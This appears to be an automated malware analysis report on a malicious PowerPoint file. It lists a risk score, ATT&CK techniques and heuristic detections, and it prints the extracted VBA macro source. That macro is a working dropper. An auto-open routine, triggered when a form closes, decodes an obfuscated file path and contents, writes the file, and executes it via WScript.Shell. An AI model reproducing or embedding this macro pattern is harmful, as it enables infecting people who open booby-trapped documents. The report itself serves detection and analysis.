MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing a VBA macro with an Auto_Open subroutine. This macro utilizes WScript.Shell to execute a command, specifically 'C:\Windows\Explorer', which is likely used to launch a second-stage payload. The script also attempts to create a file with content derived from obfuscated strings, further indicating a downloader or dropper functionality.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1550 bytes |
SHA-256: ad862f65b72d8dbe55ac0e68fc21dbee933362dbb186e6663fe569ab8121f572 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Atletico"
Public Sub aUtO_oPeN()
Moushe.Show
End Sub
Attribute VB_Name = "Moushe"
Attribute VB_Base = "0{0DCD7515-314E-46BB-BB44-4762087DBB18}{DB0CD6ED-8AA6-4B31-ACE4-F991E3E40875}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Nonhes As New Contado
Private Sub UserForm_Terminate()
Nonhes.Ubbos
End Sub
Attribute VB_Name = "Contado"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function Cebra(Cabra)
Cebra = Replace(Cabra, ":4[t6};({Nt2/&un%8+}z[7N&b}b:q", "")
End Function
Sub Ubbos()
Dim Polhen As String: Polhen = Moushe.Lechuza.Tag
Dim Pesguisas As String: Pesguisas = Cebra(Polhen)
Open Pesguisas For Output As #1
Dim Cohelho As String: Cohelho = Moushe.Lechuza.ControlTipText
Dim Savonhes As String: Savonhes = Cebra(Cohelho)
Print #1, Savonhes
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set Ana = CreateObject("WScript.Shell")
Set Gold = Ana.exEc("C:\Windows\Explorer " & Pesguisas)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 53760 bytes |
SHA-256: 67b86d4387ff750776943cc44d1c9c2ea784f6e4b3d2b6a38e934291e4338c4d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.